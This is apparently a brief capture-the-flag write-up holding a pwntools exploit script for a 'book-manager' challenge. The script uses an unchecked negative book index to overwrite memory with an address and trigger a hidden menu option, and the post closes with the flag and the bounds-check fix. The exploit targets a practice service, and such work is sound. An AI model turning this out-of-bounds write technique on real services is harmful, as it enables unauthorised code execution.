
pwn/infobahnCTF 2025: beginner pascalpwn

author

was playing NCL but did 1 beginner pwn chal for 0xfun then left

from pwn import *

# pwntools log verbosity for this run.
context.log_level = "info"

# Remote challenge service the script talks to.
HOST = "book-manager.challs.infobahnc.tf"
PORT = 1337

# Book index sent to the edit menu. It is negative, i.e. outside any valid
# book slot; the write-up attributes the bug to edit() not bounds-checking
# this value.
INDEX = -2056

# 0x401110 packed by pwntools' p64 into 8 bytes (little-endian under the
# pwntools defaults). NOTE(review): the page does not say what lives at this
# address in the challenge binary -- confirm against the binary.
PAYLOAD = p64(0x401110)

def ch(io, c):
    """Answer the main-menu prompt with option *c*.

    Waits on *io* for ``Choose an option:`` and then sends ``str(c)``
    as a single line.
    """
    choice = f"{c}".encode()
    io.sendlineafter(b"Choose an option:", choice)

def create(io):
    """Add one placeholder book (title and author both ``A``).

    Picks menu option 1, answers the title and author prompts, then
    consumes output up to the ``Book added!`` confirmation.
    """
    ch(io, 1)
    for prompt in (b"Enter title:", b"Enter author:"):
        io.sendlineafter(prompt, b"A")
    # The received data is discarded; this only syncs with the service.
    io.recvuntil(b"Book added!", drop=True)

def edit_title(io, idx, data):
    """Edit book *idx*, writing *data* as the title and an empty author.

    Picks menu option 3, sends *idx* at the ``book index`` prompt, then
    sends *data* plus a newline for the title and a bare newline for the
    author. *idx* is passed through as given; no range check is done here.
    """
    ch(io, 3)
    index_line = str(idx).encode()
    io.sendlineafter(b"book index", index_line)
    title_line = data + b"\n"
    io.sendafter(b"New title:", title_line)
    # Bare newline: the author field gets no payload on this pass.
    io.sendafter(b"New author:", b"\n")

def edit_author(io, idx, data):
    """Edit book *idx*, writing an empty title and *data* as the author.

    Picks menu option 3, sends *idx* at the ``book index`` prompt, then
    sends a bare newline for the title and *data* plus a newline for the
    author. *idx* is passed through as given; no range check is done here.
    """
    ch(io, 3)
    index_line = str(idx).encode()
    io.sendlineafter(b"book index", index_line)
    # Bare newline: the title field gets no payload on this pass.
    io.sendafter(b"New title:", b"\n")
    author_line = data + b"\n"
    io.sendafter(b"New author:", author_line)

def callsecret(io):
    """Pick menu option 5 on *io*.

    NOTE(review): the page does not describe what option 5 does on the
    service -- confirm against the challenge binary.
    """
    option = 5
    ch(io, option)

def main():
    """Run the scripted session against HOST:PORT, then go interactive.

    Connects with a 5 second timeout, creates one book, and then edits
    book index INDEX twice: first with PAYLOAD in the title field, then
    with PAYLOAD in the author field. Menu option 5 is selected after
    each edit. The write-up attributes the result to edit() not
    bounds-checking the index.
    """
    io = remote(HOST, PORT, timeout=5.0)
    create(io)
    # Title pass first, author pass second, option 5 after each.
    for edit in (edit_title, edit_author):
        edit(io, INDEX, PAYLOAD)
        callsecret(io)
    io.interactive()

# Run the session only when this file is executed as a script, not when
# it is imported.
if __name__ == "__main__":
    main()

#infobahn{p4Sc@l_pwn_1s_fUn_r1ght??_83093484308}

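worked bc edit() didn't bounds-check the book index, so the negative INDEX wrote outside the book array. rejecting any index outside 0..count-1 before the write fixes it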

ts a scriptdump now bc i want more blog posts